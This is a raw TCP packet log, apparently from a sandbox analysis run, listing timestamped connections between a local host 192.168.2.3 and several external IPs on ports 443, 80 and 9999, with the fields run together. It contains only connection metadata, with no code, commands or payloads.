                                                                                                                                                Sep 29, 2022 14:50:05.319734097 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.319801092 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.326647043 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.326678991 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.326709986 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.326822042 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.326977968 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.538912058 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.539096117 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.763967037 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.764029980 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.764065981 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.764086962 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.764202118 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.830847979 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.830898046 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.830928087 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.830946922 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.831059933 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.831088066 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.831160069 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.831218004 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.831712008 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.831741095 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.831948042 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.831970930 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.831988096 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.832779884 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.839983940 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.840015888 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.840156078 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.840341091 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.840377092 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.840410948 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.840532064 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.840626001 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.842557907 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.842586994 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.842729092 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.842777014 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.842783928 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.842801094 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.842920065 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.843003988 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.844266891 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.844289064 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.844479084 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.844548941 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.844557047 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.844572067 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.844680071 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.844795942 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.845287085 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.845310926 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.845496893 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.852013111 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.852042913 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.852068901 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.852209091 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.852328062 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.853270054 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.853292942 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.853456974 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.853785992 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.853804111 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.853835106 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.853897095 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.853979111 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.854521990 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.854543924 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.854702950 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.855058908 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.855077028 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.855093002 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.855151892 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.855220079 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.855814934 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.855834007 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.855973005 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.856184959 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.856200933 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.856220007 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.856374025 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.857037067 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.857062101 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.857197046 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.857584000 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.857595921 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.857610941 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.857680082 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.857808113 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.858392954 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.858409882 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.858596087 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.859149933 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.859165907 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.859180927 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.859236956 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.859333992 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.859961033 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.859989882 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.860152006 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.860502005 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.860512972 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.860527039 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.860599041 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.860682011 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.861594915 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.861613989 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.861797094 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.862234116 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.862242937 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.862257957 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.862312078 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.862401009 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.862863064 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.862874985 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.863125086 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.863727093 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.863739014 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.863755941 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.863810062 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.863976955 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.864020109 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.864521027 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.864543915 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.864732981 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.865266085 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.865278006 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.865294933 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.865360022 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.865417957 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.865470886 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.866004944 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.866019011 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.866187096 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.866983891 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.867002964 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.867019892 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.867053032 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.867109060 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.867177963 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.867794037 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.867815971 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.868033886 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.868711948 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.868735075 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.868911028 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.869462013 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.869482040 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.869683981 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.870146990 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.870161057 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.870358944 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.870843887 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.870862961 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.871141911 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.871999979 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.872018099 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.872248888 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.872862101 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.872879982 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.873177052 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.873976946 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.873999119 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.874224901 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.874922991 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.874942064 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.875149965 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.876405001 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.935816050 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.967840910 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:07.132514954 CEST497839999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:50:07.874505997 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:08.726228952 CEST4978480192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:08.743324995 CEST8049784172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:08.743464947 CEST4978480192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:08.743513107 CEST4978480192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:08.760442972 CEST8049784172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:08.787147999 CEST8049784172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:08.892669916 CEST4978480192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:09.670130968 CEST497859999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:50:09.785746098 CEST4978480192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:10.361759901 CEST497789999192.168.2.3190.186.45.170
                                                                                                                                                Sep 29, 2022 14:50:10.707767963 CEST4978680192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:10.725862026 CEST8049786172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:10.726006031 CEST4978680192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:10.726085901 CEST4978680192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:10.743762970 CEST8049786172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:10.770498991 CEST8049786172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:10.892822981 CEST4978680192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:10.963754892 CEST4978680192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:12.004383087 CEST4978780192.168.2.3185.53.177.53
                                                                                                                                                Sep 29, 2022 14:50:12.020922899 CEST8049787185.53.177.53192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:12.021111965 CEST4978780192.168.2.3185.53.177.53
                                                                                                                                                Sep 29, 2022 14:50:12.037755966 CEST8049787185.53.177.53192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:12.037893057 CEST4978780192.168.2.3185.53.177.53
                                                                                                                                                Sep 29, 2022 14:50:12.054275036 CEST8049787185.53.177.53192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:12.054307938 CEST8049787185.53.177.53192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:12.259054899 CEST8049787185.53.177.53192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:12.259443045 CEST4978780192.168.2.3185.53.177.53
                                                                                                                                                Sep 29, 2022 14:50:12.559968948 CEST497889999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:50:13.824690104 CEST4978980192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:13.841202021 CEST8049789172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:13.849931002 CEST4978980192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:13.851249933 CEST4978980192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:13.867672920 CEST8049789172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:13.894345999 CEST8049789172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.060977936 CEST4978980192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:14.583471060 CEST4972780192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:14.706984043 CEST4973380192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:14.707375050 CEST4979080192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:14.730340004 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.730380058 CEST8049733162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.734347105 CEST4979080192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:14.734474897 CEST4979080192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:14.757427931 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.757523060 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.757550955 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.757582903 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.757610083 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.757654905 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.757682085 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.759494066 CEST4979080192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:14.854819059 CEST4979080192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:14.878072023 CEST8049790162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:14.891163111 CEST4979080192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:15.338323116 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:15.361613035 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.371646881 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:15.372291088 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:15.395198107 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.395385027 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.395417929 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.395508051 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.395540953 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.395569086 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.395596981 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.397555113 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:16.205147028 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:16.228202105 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:16.228317022 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:16.228364944 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:16.228451014 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:16.228858948 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:16.229379892 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:16.229475021 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:16.229511976 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:16.230304003 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:17.170990944 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:17.194001913 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:17.194144964 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:17.194165945 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:17.194185019 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:17.194204092 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:17.194225073 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:17.194248915 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:17.204734087 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:18.337379932 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:18.361470938 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:18.361566067 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:18.361608028 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:18.361639977 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:18.361675024 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:18.361706972 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:18.361738920 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:18.369345903 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:19.313313961 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:19.344508886 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:19.344549894 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:19.344573975 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:19.344625950 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:19.344652891 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:19.344676971 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:19.344928980 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:20.160240889 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:20.183646917 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:20.183708906 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:20.183737993 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:20.183763981 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:20.183790922 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:20.183819056 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:20.201515913 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:20.860146999 CEST497929999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:50:21.213207006 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:21.236571074 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:21.236623049 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:21.236655951 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:21.236684084 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:21.236711979 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:21.236741066 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:21.252362967 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:21.252362967 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:22.143178940 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:22.166436911 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:22.166490078 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:22.166518927 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:22.166548967 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:22.166577101 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:22.166603088 CEST8049791162.55.0.137192.168.2.3
